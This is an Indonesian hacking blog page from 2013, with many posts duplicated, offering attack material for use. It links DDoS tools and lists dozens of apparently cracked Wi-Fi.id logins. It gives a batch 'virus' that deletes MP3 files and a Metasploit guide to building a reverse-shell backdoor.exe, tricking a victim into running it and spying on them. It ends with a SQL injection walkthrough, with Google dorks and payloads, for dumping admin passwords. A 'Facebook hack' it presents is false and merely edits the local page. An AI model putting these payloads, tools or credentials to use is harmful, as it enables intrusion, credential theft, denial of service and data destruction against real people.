Buat Yang Senior/Gak Butuh Ilmu Lewatin Aja
Hal Yang Terpenting Download Python
Yang Harus Di Perhatikan
Jika sudah di Instal Phtonya Cari filenya Di C
next, lihat script Python tadi yang sudah kamu download cp.py..
* simpan cp.py di Local disk C :
* buat directory/folder di Local disk C dengan nama terserah kamu ~ceilaa ( folder data penyimpanan config )
truss...
* buka cmd, dan ketik perintah..
- cd\
- cp.py [URL CONFIG] c:[folder data penyimpanan config] (liat gambar)
tunggu sampai Muncul PAsnya dan Selesai
Statistic User
Labels
- Cracking (5)
- Ebook (3)
- Hacking (12)
- Networking (2)
- Phereaking (3)
- Script Love (1)
- Tool HAcking (1)
- Ubuntu (4)
- Virus (3)
- Windows (3)
Labels
- Cracking (5)
- Ebook (3)
- Hacking (12)
- Networking (2)
- Phereaking (3)
- Script Love (1)
- Tool HAcking (1)
- Ubuntu (4)
- Virus (3)
- Windows (3)
Blogroll
Blog Roll
Labels
- Cracking (5)
- Ebook (3)
- Hacking (12)
- Networking (2)
- Phereaking (3)
- Script Love (1)
- Tool HAcking (1)
- Ubuntu (4)
- Virus (3)
- Windows (3)
Labels
- Cracking (5)
- Ebook (3)
- Hacking (12)
- Networking (2)
- Phereaking (3)
- Script Love (1)
- Tool HAcking (1)
- Ubuntu (4)
- Virus (3)
- Windows (3)
Pages
Jumat, 13 Desember 2013
Kumpulan Tools Untuk DDOS dan Hacking 2013
Gunakan Dengan Baik !
Tools : ByteDOS V3.2 http://www.mediafire.com/?pxv4pbx
jg3a2vqa
Hoic V2.1 Here USE BOOSTERS )Turbinas V1.0 HEre
Slowloris Here
SYN Flood DOS Here kurang silahkan cari di File B-Compi
Sebelum menyerang, lindungi Ip kamu :SEGURITY KISS TUNEL:HEre
HOTSPOT SHIELD: HEre
ULTRA VPN: Here
CYBERGHOST: Here
SumRando :http://www.sumrando.com/
Tunnelbear 1.0: Here
Hack password WIFI 100% WORK Here
ALL IN ONE
Tools : ByteDOS V3.2 http://www.mediafire.com/?pxv4pbx
jg3a2vqa
Hoic V2.1 Here USE BOOSTERS )Turbinas V1.0 HEre
Slowloris Here
SYN Flood DOS Here kurang silahkan cari di File B-Compi
Sebelum menyerang, lindungi Ip kamu :SEGURITY KISS TUNEL:HEre
HOTSPOT SHIELD: HEre
ULTRA VPN: Here
CYBERGHOST: Here
SumRando :http://www.sumrando.com/
Tunnelbear 1.0: Here
Hack password WIFI 100% WORK Here
ALL IN ONE
Cara hack facebook metode 2013
Ikut Langkah Berikut :
Sebelum syarat utama ente harus sabar,relek, dan jangan emosi apapun akibatnya
Syarat Utama Browser harus pakai Firefox
Pertama :
Silahkan Menuju Facebook Siapa saja, sebaiknya di coba Pakai FB Temen-temen deket dulu, ntar bisa minta maaf koq.
Oke lanjut, setelah Terbuka Silahkan Lanjutkan Kelangkah berikut… ” Hati-hati Melangkahnya Ntar KePleset, Lagi Musim banjir ”
Kedua :
Copy Kode Berikut :
jdocument.body.contenEditable=’true’; document.designMode=’on’; void 0
Ketiga x :
Hapus Alamat ( Ulr ) Facebook Teman kita tadi yang ada di Address Bar
Pastekan Kode diatas pada Address bar yg tadi di Hapus,
Setelah Terbuka Silahkan Ganti Alamat nya dengan Script diatas
Sekarang tekan ENTER
Tunggu Beberapa saat sampai Scriptnya bekerja
Keempat :
Saatnya kita Beraksi
Klik Kanan Gambar atau Photo mana Saja, Sobat Bisa hapus dengan cara Klik Delete, atau bisa sobat Pindahkan kemana saja dengan menyeret Mouse
Kelima :
Horeeeee.. Berhasil…
Mr.Kamikaze
Sebelum syarat utama ente harus sabar,relek, dan jangan emosi apapun akibatnya
Syarat Utama Browser harus pakai Firefox
Pertama :
Silahkan Menuju Facebook Siapa saja, sebaiknya di coba Pakai FB Temen-temen deket dulu, ntar bisa minta maaf koq.
Oke lanjut, setelah Terbuka Silahkan Lanjutkan Kelangkah berikut… ” Hati-hati Melangkahnya Ntar KePleset, Lagi Musim banjir ”
Kedua :
Copy Kode Berikut :
jdocument.body.contenEditable=’true’; document.designMode=’on’; void 0
Ketiga x :
Hapus Alamat ( Ulr ) Facebook Teman kita tadi yang ada di Address Bar
Pastekan Kode diatas pada Address bar yg tadi di Hapus,
Setelah Terbuka Silahkan Ganti Alamat nya dengan Script diatas
Sekarang tekan ENTER
Tunggu Beberapa saat sampai Scriptnya bekerja
Keempat :
Saatnya kita Beraksi
Klik Kanan Gambar atau Photo mana Saja, Sobat Bisa hapus dengan cara Klik Delete, atau bisa sobat Pindahkan kemana saja dengan menyeret Mouse
Kelima :
Horeeeee.. Berhasil…
Mr.Kamikaze
Download Shell Dengan fiture Lengkap
Kali ini saya akan membagikan shell dengan fitur lengkap gan :) masih segar :D
Rabu, 11 Desember 2013
Hack Wi-Fi Id Dengan Gratiis
Kali Ini Saya Akan Membagikan Kalaian Kode Yang saya Sudah PEcahkan Sebagian :D Mudahan2 Agan2 semua Bisa Menikmatinya :)
wi -fi id
wi -fi id
111135100018
Password: 21297
Username: 111135100019
Password: 522775
Username: 111135100020
Password: 523098
Username: 111135100021
Password: 21135
Username: 111135100022
Password: 21444
Username: 111135100025
Password: 21020
Username: 111135100338
Password: 2524201
Username: 111135100342
Password: 21031
Username: 111135100343
Password: 2524203
Username: 111135100353
Password: 21482
Username: 111135100356
Password: 2524595
Username: 111135100359
Password: 2524207
Username: 111135100360
Password: 2524208
Username: 111135100362
Password: 21495
Username: 111135100364
Password: 2524885
Username: 111135100366
Password: 21709
Username: 111135100367
Password: 21032
Username: 111135100370
Password: 2524211
Username: 111135100371
Password: 2524092
Username: 111135100373
Password: 2524213
Username: 111135100374
Password: 2524591
Username: 111135100376
Password: 2524598
Username: 111135100383
Password: 2522
Sekian Dari saya Mr. Kamikaze :)
Cara Membuat Virus Mengunakan Dos
Sebenarnya saya tidak bergitu tertarik membahas tema yang satu
ini. Karena cenderung bersifat merusak. Jadinya, saya tidak akan
berpanjang lebar dalam bab ini. Ada banyak cara untuk membuat
virus, salah satunya dalam buku ini adalah dengan DOS.
Saya hanya akan memberikan sebuah contoh sangat sederhana
dalam pembuatan virus. Efeknya akan menghapus file MP3 yang
ada dalam komputer. Sebenarnya saya pernah melihat sebuah
virus penghapus MP3 yang dibuat menggunakan Visual Basic,
tapi kalau cuma mau menghapus sebuah file, rasanya tidak perlu
menggunakan banyak-banyak source code.
Bahkan dalam buku ini Anda bisa membuat virus sejenis hanya
dengan satu baris perintah pada DOS. Tidak cuma itu, Anda juga
bisa mengkreasikannya untuk melakukan aksi delete jenis file
lainnya, cuma dengan menggantikan ekstensi file. Anda juga bisa
memodifikasi untuk menghapus semua file MP3 dalam seluruh
drive atau hanya dalam folder tertentu.
ini. Karena cenderung bersifat merusak. Jadinya, saya tidak akan
berpanjang lebar dalam bab ini. Ada banyak cara untuk membuat
virus, salah satunya dalam buku ini adalah dengan DOS.
Saya hanya akan memberikan sebuah contoh sangat sederhana
dalam pembuatan virus. Efeknya akan menghapus file MP3 yang
ada dalam komputer. Sebenarnya saya pernah melihat sebuah
virus penghapus MP3 yang dibuat menggunakan Visual Basic,
tapi kalau cuma mau menghapus sebuah file, rasanya tidak perlu
menggunakan banyak-banyak source code.
Bahkan dalam buku ini Anda bisa membuat virus sejenis hanya
dengan satu baris perintah pada DOS. Tidak cuma itu, Anda juga
bisa mengkreasikannya untuk melakukan aksi delete jenis file
lainnya, cuma dengan menggantikan ekstensi file. Anda juga bisa
memodifikasi untuk menghapus semua file MP3 dalam seluruh
drive atau hanya dalam folder tertentu.
Yang perlu Anda ketikkan dalam DOS adalah:
echo for %%p in (C:\hack) do del *.mp3 %0 %%p:>virusdot.bat
Maka akan muncul seekor virus yang bernama virus.dot dalam
folder yang aktif.
folder yang aktif.
Untuk menjalankannya, saya serahkan kepada Anda. Apakah
mau menggunakan Social Engineering, dipasang di StartUp.
Semua itu urusan Anda. Saya hanya mengajari cara membuatnya
saja. Sebagai contoh, saya langsung mengaktifkan file virus
virusdos.bat tersebut.
Perhatikan, sekarang virus itu telah bekerja dengan menghapus
semua file MP3 yang ada di dalamnya. Termasuk virus itu sendiri
menghilangkan dirinya, untuk menghapus jejak.
mau menggunakan Social Engineering, dipasang di StartUp.
Semua itu urusan Anda. Saya hanya mengajari cara membuatnya
saja. Sebagai contoh, saya langsung mengaktifkan file virus
virusdos.bat tersebut.
Perhatikan, sekarang virus itu telah bekerja dengan menghapus
semua file MP3 yang ada di dalamnya. Termasuk virus itu sendiri
menghilangkan dirinya, untuk menghapus jejak.
Ini Sudah Membukktikan Anda Mau coba ??
Rabu, 02 Oktober 2013
Cara mengendalikan komputer orang lain menggunakan backtrack
Dalam tutorial ini saya akan mengeksploitasi Windows 7 Sp1 OS menggunakan Metasploit. saya akan menggunakan mengeksploitasi / multi / handler modul yang "memberikan semua fitur dari sistem payload Metasploit untuk eksploitasi yang telah diluncurkan di luar kerangka"
Sebelum kita jalankan Metasploit, kita perlu menciptakan muatan untuk mendapatkan shell meterpreter. Untuk membuat jenis payload ini di terminal
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe
Saya menggunakan Port 4444 (Anda dapat memilih port Anda sendiri) untuk LPORT yang mendengarkan port dan mengatur LHOST ke IP penyerang jarak jauh yang jelas alamat IP lokal Anda, IP saya adalah 192.168.10.5.
Jika semua berjalan dengan baik, Anda harus dapat membuat sesi meterpreter. Ketik sysinfo untuk mengumpulkan beberapa info pada mesin. Untuk mengetahui perintah lain untuk meterpreter jenis bantuan. Ada juga perintah meterpreter lain seperti menangkap screenshot dari PC, merekam keystrokes, menangkap snapshot dari webcam, dll Untuk memasukkan perintah shell dari mesin, tipe shell.
Terima kasih! Atas Suhu
Sebelum kita jalankan Metasploit, kita perlu menciptakan muatan untuk mendapatkan shell meterpreter. Untuk membuat jenis payload ini di terminal
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe
Saya menggunakan Port 4444 (Anda dapat memilih port Anda sendiri) untuk LPORT yang mendengarkan port dan mengatur LHOST ke IP penyerang jarak jauh yang jelas alamat IP lokal Anda, IP saya adalah 192.168.10.5.
Setelah itu, Anda harus dapat melihat file bernama sebagai backdoor.exe di / root. Mengirim file ke Slave dengan menggunakan keterampilan Rekayasa Sosial Anda dan biarkan dia klik file tersebut. Anda dapat mengubah nama file sehingga tidak jelas.
Peluncuran Metasploit dan mengatur exploit dengan mengetikkan perintah ini di msfconsole Anda:
Peluncuran Metasploit dan mengatur exploit dengan mengetikkan perintah ini di msfconsole Anda:
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit
Jika semua berjalan dengan baik, Anda harus dapat membuat sesi meterpreter. Ketik sysinfo untuk mengumpulkan beberapa info pada mesin. Untuk mengetahui perintah lain untuk meterpreter jenis bantuan. Ada juga perintah meterpreter lain seperti menangkap screenshot dari PC, merekam keystrokes, menangkap snapshot dari webcam, dll Untuk memasukkan perintah shell dari mesin, tipe shell.
Terima kasih! Atas Suhu
Inquiry
Cara hacking menggunakan SQLI injection
1) MENEMUKAN TARGET DAN MENDAPATKAN ADMIN PASSWORD
Pertama kita harus menemukan website target kami untuk melakukan itu Anda dapat menggunakan ini "dorks". Saya akan memberikan beberapa Dorks sini menyalin siapa pun itu dan paste di google dan pencarian.
2). Periksa kerentanan
Mari kita mengatakan bahwa kita memiliki beberapa situs seperti ini
http://www.site.com/news.php?id=4 serikat semua pilih 1,2,3 / *
CATATAN: jika / * tidak bekerja atau Anda mendapatkan beberapa error, kemudian coba - itu komentar dan sangat penting bagi query kita untuk bekerja dengan baik.
Katakanlah bahwa kita memiliki nomor 2 di layar, sekarang untuk memeriksa versi
kita ganti nomor 2 dengan @ @ version atau version () dan mendapatkan someting seperti 4.1.33-log atau 5.0.45 atau mirip.
seharusnya terlihat seperti ini
Anda mendapatkan error "union + campuran ilegal collations (IMPLISIT + yg dpt dipaksa) ..."
saya tidak melihat kertas yang mencakup masalah ini, jadi saya harus menulis itu
apa yang kita butuhkan adalah mengkonversi () fungsi
i.e.
yaitu
6). Mendapatkan meja dan nama kolom
baik jika versi MySQL adalah <5 (yaitu 4.1.33, 4.1.12 ...) <--- nanti saya akan menjelaskan untuk MySQL> 5 versi.
kita harus menebak table dan nama kolom dalam banyak kasus.
nama tabel umum adalah: user / s, admin / s, member / s ...
nama kolom umum adalah: username, user, usr, user_name, password, lulus, passwd, pwd dll ..
i.e akan
Perhatikan bahwa saya menempatkan 0x3a, nilai hex untuk: (jadi 0x3a adalah nilai hex usus)
(ada cara lain untuk itu, char (58), nilai ascii untuk:)
http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables/*
i.e
i.e
i.e
terimakasih see ya
Pertama kita harus menemukan website target kami untuk melakukan itu Anda dapat menggunakan ini "dorks". Saya akan memberikan beberapa Dorks sini menyalin siapa pun itu dan paste di google dan pencarian.
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
2). Periksa kerentanan
Mari kita mengatakan bahwa kita memiliki beberapa situs seperti ini
http://www.site.com/news.php?id=4
Sekarang untuk menguji apakah adalah vulrnable kita menambahkan ke akhir url '
begini
begini
http://www.site.com/news.php?id=4'
adi jika kita mendapatkan beberapa error seperti
"Anda memiliki kesalahan dalam sintaks SQL Anda, periksa manual yang sesuai dengan Anda MySQL Server versi untuk dll benar .."
atau sesuatu yang serupa
yang berarti rentan terhadap sql injection
"Anda memiliki kesalahan dalam sintaks SQL Anda, periksa manual yang sesuai dengan Anda MySQL Server versi untuk dll benar .."
atau sesuatu yang serupa
yang berarti rentan terhadap sql injection
3). Tentukan jumlah kolom
Untuk menemukan jumlah kolom kita menggunakan pernyataan ORDER BY (menceritakan database yang cara memesan hasilnya)
jadi bagaimana menggunakannya? Yah hanya incrementing nomor sampai kita mendapatkan error.
Untuk menemukan jumlah kolom kita menggunakan pernyataan ORDER BY (menceritakan database yang cara memesan hasilnya)
jadi bagaimana menggunakannya? Yah hanya incrementing nomor sampai kita mendapatkan error.
http://www.site.com/news.php?id=4 order by 1/* <-- no error
http://www.site.com/news.php?id=4 order by 2/* <-- no error
http://www.site.com/news.php?id=4 order by 3/* <-- no error
http://www.site.com/news.php?id=4 order by 4/*
kesalahan pada order by 4 (kita mendapatkan pesan seperti ini tidak diketahui kolom '4 'in' agar klausul 'atau sesuatu seperti itu)
itu berarti bahwa ia memiliki 3 kolom, karena kita punya kesalahan pada 4.
itu berarti bahwa ia memiliki 3 kolom, karena kita punya kesalahan pada 4.
4). Periksa fungsi UNION
Dengan persatuan kita dapat memilih lebih banyak data dalam satu pernyataan sql.
jadi kita harus
Dengan persatuan kita dapat memilih lebih banyak data dalam satu pernyataan sql.
jadi kita harus
http://www.site.com/news.php?id=4 union all select 1,2,3/*
(kita sudah menemukan bahwa jumlah kolom adalah 3 di bagian 2). )
jika kita melihat beberapa nomor di layar, yaitu 1 atau 2 atau 3 maka UNION bekerja
jika kita melihat beberapa nomor di layar, yaitu 1 atau 2 atau 3 maka UNION bekerja
5). Periksa versi MySQL
http://www.site.com/news.php?id=4 serikat semua pilih 1,2,3 / *
CATATAN: jika / * tidak bekerja atau Anda mendapatkan beberapa error, kemudian coba - itu komentar dan sangat penting bagi query kita untuk bekerja dengan baik.
Katakanlah bahwa kita memiliki nomor 2 di layar, sekarang untuk memeriksa versi
kita ganti nomor 2 dengan @ @ version atau version () dan mendapatkan someting seperti 4.1.33-log atau 5.0.45 atau mirip.
seharusnya terlihat seperti ini
http://www.site.com/news.php?id=4 union all select 1,@@version,3/*
saya tidak melihat kertas yang mencakup masalah ini, jadi saya harus menulis itu
apa yang kita butuhkan adalah mengkonversi () fungsi
i.e.
http://www.site.com/news.php?id=4 union all select 1,convert(@@version using latin1),3/*
atau dengan hex () dan unhex ()
yaitu
http://www.site.com/news.php?id=4 union all select 1,unhex(hex(@@version)),3/*
dan Anda akan mendapatkan versi MySQL
baik jika versi MySQL adalah <5 (yaitu 4.1.33, 4.1.12 ...) <--- nanti saya akan menjelaskan untuk MySQL> 5 versi.
kita harus menebak table dan nama kolom dalam banyak kasus.
nama tabel umum adalah: user / s, admin / s, member / s ...
nama kolom umum adalah: username, user, usr, user_name, password, lulus, passwd, pwd dll ..
i.e akan
http://www.site.com/news.php?id=4 union all select 1,2,3 from admin/*
(kita lihat nomor 2 pada layar seperti sebelumnya, dan itu bagus)
kita tahu bahwa meja admin ada ...
sekarang untuk memeriksa nama kolom.
kita tahu bahwa meja admin ada ...
sekarang untuk memeriksa nama kolom.
http://www.site.com/news.php?id=4 union all select 1,username,3 from admin/*
(jika anda mendapatkan error, kemudian coba nama kolom lainnya)
kita mendapatkan username ditampilkan di layar, misalnya akan admin, atau superadmin dll ..
sekarang untuk memeriksa apakah ada kolom password
kita mendapatkan username ditampilkan di layar, misalnya akan admin, atau superadmin dll ..
sekarang untuk memeriksa apakah ada kolom password
http://www.site.com/news.php?id=4 union all select 1,password,3 from admin/*
(jika anda mendapatkan error, kemudian coba nama kolom lainnya)
kita lihat password pada layar di hash atau plain-text, itu tergantung dari bagaimana database diatur
i.e md5 hash, mysql hash, sha1 ...
sekarang kita harus menyelesaikan query untuk terlihat bagus
untuk itu kita dapat menggunakan concat () fungsi (itu bergabung string)
kita lihat password pada layar di hash atau plain-text, itu tergantung dari bagaimana database diatur
i.e md5 hash, mysql hash, sha1 ...
sekarang kita harus menyelesaikan query untuk terlihat bagus
untuk itu kita dapat menggunakan concat () fungsi (itu bergabung string)
i.e
http://www.site.com/news.php?id=4 union all select 1,concat(username,0x3a,password),3 from admin/*
Perhatikan bahwa saya menempatkan 0x3a, nilai hex untuk: (jadi 0x3a adalah nilai hex usus)
(ada cara lain untuk itu, char (58), nilai ascii untuk:)
http://site.com/news.php?id=4 union all select 1,concat(username,char(58),password),3 from admin/*
sekarang kita akan mendapatkan hasil nama pengguna: sandi pada layar, yaitu admin: admin atau admin: somehash
ketika Anda memiliki ini, Anda bisa login seperti admin atau superuser
jika tidak dapat menebak nama tabel yang tepat, Anda selalu dapat mencoba mysql.user (default)
memiliki pengguna i kolom password, jadi contoh akan
ketika Anda memiliki ini, Anda bisa login seperti admin atau superuser
jika tidak dapat menebak nama tabel yang tepat, Anda selalu dapat mencoba mysql.user (default)
memiliki pengguna i kolom password, jadi contoh akan
http://www.site.com/news.php?id=4 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
7). MySQL 5
Seperti saya katakan sebelumnya aku akan menjelaskan bagaimana untuk mendapatkan tabel dan nama kolom
di MySQL> 5.
Untuk ini kita perlu information_schema. Ini memegang semua tabel dan kolom dalam database.
untuk mendapatkan tabel kita menggunakan table_name dan information_schema.tables.
i.e
Seperti saya katakan sebelumnya aku akan menjelaskan bagaimana untuk mendapatkan tabel dan nama kolom
di MySQL> 5.
Untuk ini kita perlu information_schema. Ini memegang semua tabel dan kolom dalam database.
untuk mendapatkan tabel kita menggunakan table_name dan information_schema.tables.
i.e
http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables/*
di sini kita mengganti nomor 2 kita dengan table_name untuk mendapatkan tabel pertama dari
information_schema.tables ditampilkan pada layar. Sekarang kita harus menambahkan LIMIT di akhir query
untuk daftar semua tabel.
i.e
http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
perhatikan bahwa saya menempatkan 0,1 (dapatkan 1 hasil mulai dari 0?)
sekarang untuk melihat tabel kedua, kita mengubah batas 0,1 untuk membatasi 1,1
sekarang untuk melihat tabel kedua, kita mengubah batas 0,1 untuk membatasi 1,1
i.e
http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
tabel kedua ditampilkan.
untuk tabel ketiga kami menempatkan batas 2,1
untuk tabel ketiga kami menempatkan batas 2,1
i.e
http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
terus incrementing sampai Anda mendapatkan beberapa yang berguna seperti db_admin, poll_user, auth, auth_user dll ..
Untuk mendapatkan nama kolom metode adalah sama.
di sini kita menggunakan nama_kolom dan information_schema.columns
metode yang sama seperti di atas sehingga contoh akan
Untuk mendapatkan nama kolom metode adalah sama.
di sini kita menggunakan nama_kolom dan information_schema.columns
metode yang sama seperti di atas sehingga contoh akan
http://www.site.com/news.php?id=4 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
kolom pertama diplayed.
yang kedua (kita mengubah batas 0,1 untuk membatasi 1,1)
yaitu.
yang kedua (kita mengubah batas 0,1 untuk membatasi 1,1)
yaitu.
http://www.site.com/news.php?id=4 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
kolom kedua ditampilkan, jadi tetap incrementing sampai Anda mendapatkan sesuatu seperti
nama pengguna, pengguna, login, password, lulus, passwd dll ..
jika Anda ingin nama kolom tampilan untuk tabel tertentu menggunakan query ini. (mana klausa)
mari kita mengatakan bahwa kita menemukan pengguna meja.
nama pengguna, pengguna, login, password, lulus, passwd dll ..
jika Anda ingin nama kolom tampilan untuk tabel tertentu menggunakan query ini. (mana klausa)
mari kita mengatakan bahwa kita menemukan pengguna meja.
http://www.site.com/news.php?id=4 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
sekarang kita bisa ditampilkan nama kolom dalam tabel pengguna. Hanya menggunakan LIMIT kita bisa daftar semua kolom dalam tabel pengguna.
Catatan bahwa ini tidak akan bekerja jika tanda kutip ajaib ON.
mari kita mengatakan bahwa kita menemukan colums user, pass, dan email.
sekarang untuk menyelesaikan query untuk menempatkan mereka semua bersama-sama
untuk itu kita menggunakan concat (), i decribe itu sebelumnya.
Catatan bahwa ini tidak akan bekerja jika tanda kutip ajaib ON.
mari kita mengatakan bahwa kita menemukan colums user, pass, dan email.
sekarang untuk menyelesaikan query untuk menempatkan mereka semua bersama-sama
untuk itu kita menggunakan concat (), i decribe itu sebelumnya.
http://www.site.com/news.php?id=4 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
apa yang kita dapatkan di sini adalah pengguna: pass: email dari pengguna meja.
contoh: admin: hash: whatever@blabla.com
Sumber: Wikipedia, Google, forum hack dan lain-lain
Kredit untuk semua orang yang berhak menerimanya
contoh: admin: hash: whatever@blabla.com
Sumber: Wikipedia, Google, forum hack dan lain-lain
Kredit untuk semua orang yang berhak menerimanya
Langganan:
Postingan (Atom)
Pencarian
Follower
Entri Populer
-
1 ) MENEMUKAN TARGET DAN MENDAPATKAN ADMIN PASSWORD Pertama kita harus menemukan website target kami untuk melakukan itu Anda dap...
-
1 buka dulu scrip yang ingin anda edit boss contoh siapkan note pad. . 2 siapkan sript yang ingin di edit dengan .html agar lebih mudah gan...
-
Mobile Application Hacking Diary Ep.1 Hacking Trust Relationships Between SIP Gateways A Pentester's Guide to Hacking OData Hacking A...
-
Assalamualaikum Sedikit cara dari saya, cara upload shell jpg . Guna shell jpg adalah meminimalisir •terhapusnya shell •ketahua...
-
Assalamu'alaikum Wr Wb :hi: ketemu agy ma ane : Mr.kamikaze gak usah banyak cingcong dh : CEKIDOT !!! ===============...
-
emarin seriing temuin folder di PC yang tidak bisa di hapus, salah satunya .Trash-1000/.Trash-1001 akibat pakek backtrack, dan kemarin mut...
-
Hei teman . Hari ini saya memberitahu Anda bagaimana untuk membuat website phishing , cara menaruhnya online dan bagaimana untuk me...
-
# MIPS Little Endian Reverse Shell ASM File and Assembled Shellcode # Written by Jacob Holcomb, Security Analyst @ Independent Security E...
-
Dalam tutorial ini saya akan mengeksploitasi Windows 7 Sp1 OS menggunakan Metasploit . saya akan menggunakan mengeksploitasi / m...
-
Salah satu tujuan seseorang untuk mengganti Mac Address adalah karena berbuat usil pada jaringan komputer kampus atau kantor seperti Suka ...